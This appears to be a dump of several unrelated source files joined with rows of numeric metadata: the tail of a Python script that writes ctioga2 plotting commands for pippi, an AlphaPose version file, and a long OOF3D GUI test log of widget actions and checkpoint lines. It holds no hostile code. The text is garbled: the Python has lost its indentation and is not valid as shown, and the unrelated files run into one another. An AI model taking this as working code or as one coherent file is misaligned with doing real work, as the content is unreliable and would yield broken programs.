outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(mainContourLevels,main)+'\'\\\n')
if contours2D.value is not None:
# Plot comparison contours
outfile.write(' --plot '+currentParse+'_'+sec+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
outfile.write(' --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Like vs. Posterior\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
# Get best-fit point
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
# Get posterior mean
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
# Always plot both best fit and posterior mean on comparison plot
if PosteriorIsMainInComboPlot:
bestFitData = [colours.value.comparisonBestFitMarker, colours.value.comparisonBestFitColour, colours.value.comparisonBestFitColour, colours.value.comparisonBestFitMarkerScale]
postMeanData = [colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour2D, colours.value.mainPostMeanColourOutline2D, colours.value.mainPostMeanMarkerScale]
else:
bestFitData = [colours.value.mainBestFitMarker, colours.value.mainBestFitColour2D, colours.value.mainBestFitColourOutline2D, colours.value.mainBestFitMarkerScale]
postMeanData = [colours.value.comparisonPostMeanMarker, colours.value.comparisonPostMeanColour, colours.value.comparisonPostMeanColour, colours.value.comparisonPostMeanMarkerScale]
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+bestFitData[0]+' /fill-color \''+str(bestFitData[1])+'\' /stroke-color \''+str(bestFitData[2])+
'\' /scale '+str(bestFitData[3])+' \\\n')
if postMean: outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+postMeanData[0]+' /fill-color \''+str(postMeanData[1])+'\' /stroke-color \''+str(postMeanData[2])+
'\' /scale '+str(postMeanData[3])+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_combo2D.bsh', shell=True)
def getContours(parseFilename,plot,statistic):
# Construct dimensionality of plot and string indicating specific plot (if any)
if type(plot) == list:
[dim, plot] = [str(len(plot)), '' if statistic == 'like' else '_'+'_'.join([str(x) for x in plot])]
else:
[dim, plot] = ['1', '' if statistic == 'like' else '_'+str(plot)]
# Open contour file
contourfile = safe_open(parseFilename+plot+'_'+statistic+dim+'D.contours')
# Read contents
fileContents = contourfile.readline()
while fileContents[0] == '#': fileContents = contourfile.readline()
#Shut it
contourfile.close
levels = fileContents.split()
return levels
def getContours_obs(parseFilename,plot,observable):
# Construct dimensionality of plot and string indicating specific plot (if any)
if type(plot) == list:
[dim, plot] = [str(len(plot)), '_'+'_'.join([str(x) for x in plot])]
# Open contour file
contourfile = safe_open(parseFilename+plot+'_obs'+dim+'D_' + str(observable) + '.contours')
# Read contents
fileContents = contourfile.readline()
while fileContents[0] == '#': fileContents = contourfile.readline()
#Shut it
contourfile.close
levels = fileContents.split()
return levels
def getCentralVal(parseFilename,plot,statistic,lk):
# Find central value (either best fit or posterior mean) for requested plot
# Open .best file
bestfile = safe_open(parseFilename+'.best')
# Read contents
fileContents = bestfile.readline()
while fileContents[0] == '#': fileContents = bestfile.readline()
fileContents = bestfile.readlines()
# Shut it
bestfile.close
if statistic == 'like':
# Extract best fit
point = fileContents[1].split()
elif statistic == 'post':
try:
# Extract posterior pdf
point = fileContents[3].split()
except IndexError:
return None
else:
# Never get here
sys.exit('Error: unrecognised statistic in pippi_script.getCentralVal.\nQuitting...')
# Choose the coordinates corresponding to the axes of the current plot
if type(plot) == list:
coordinates = [point[lk.value[x]] for x in plot]
else:
coordinates = point[lk.value[plot]]
return coordinates
def dictFallback(risky,safe,key):
# Try to extract entry corresponding to key from risky dataObject, otherwise use safe dataObject
try:
return risky.value[key]
except (KeyError, TypeError):
return safe.value[key]
| 63.615782 | 194 | 0.589534 | 9,134 | 86,263 | 5.534706 | 0.059448 | 0.077145 | 0.026487 | 0.022431 | 0.859081 | 0.848004 | 0.836037 | 0.831131 | 0.827551 | 0.813922 | 0 | 0.018847 | 0.265583 | 86,263 | 1,355 | 195 | 63.662731 | 0.779126 | 0.098397 | 0 | 0.745597 | 0 | 0.006849 | 0.194426 | 0.043738 | 0.000978 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.003914 | null | null | 0.004892 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
80ffd8af584b8a15cca887740482b4f326725e0b | 113 | py | Python | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | # GENERATED VERSION FILE
# TIME: Fri Apr 1 13:21:51 2022
__version__ = '0.5.0+8b99d03'
short_version = '0.5.0'
| 18.833333 | 32 | 0.690265 | 21 | 113 | 3.47619 | 0.714286 | 0.219178 | 0.246575 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234043 | 0.168142 | 113 | 5 | 33 | 22.6 | 0.542553 | 0.469027 | 0 | 0 | 1 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
440a47454c60e828bffee782f663b4def519662f | 71,415 | py | Python | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 31 | 2015-04-01T15:59:36.000Z | 2022-03-18T20:21:47.000Z | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 3 | 2015-02-06T19:30:24.000Z | 2017-05-25T14:14:31.000Z | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 7 | 2015-01-23T15:19:22.000Z | 2021-06-09T09:03:59.000Z | # -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
import tests
#This GUI test case is tight to the skeleton page global test.
#It aims to check if the skeleton Surface Smooth Method is reliabily working according
#to the sensitization of the OK button in case of an Heterogenity, Selection , Group situations.
#This case has no targets. Base on our comments on the 0010501 in this test we should just check that the OK Button is always sensitized in all cases.
findWidget('OOF3D').resize(550, 350)
#Loading the script log file of the entry general skeleton page test case 0010500.
findMenu(findWidget('OOF3D:MenuBar'), 'File:Load:Script').activate()
checkpoint toplevel widget mapped Dialog-Script
findWidget('Dialog-Script').resize(190, 67)
findWidget('Dialog-Script:filename').set_text('TEST_DATA/skelpagetestbase.log')
findWidget('Dialog-Script:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint OOF.Microstructure.New
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint microstructure page sensitized
checkpoint OOF.Microstructure.Create_From_ImageFile
checkpoint Move Node toolbox info updated
checkpoint toplevel widget mapped OOF3D Graphics 1
checkpoint OOF.Windows.Graphics.New
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Messages 1').resize(593, 200)
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
findWidget('OOF3D Activity Viewer').resize(400, 300)
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Copy
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Delete
checkpoint OOF.File.Save.Skeleton
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint OOF.Skeleton.New
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Copy
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Delete
checkpoint OOF.File.Save.Skeleton
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
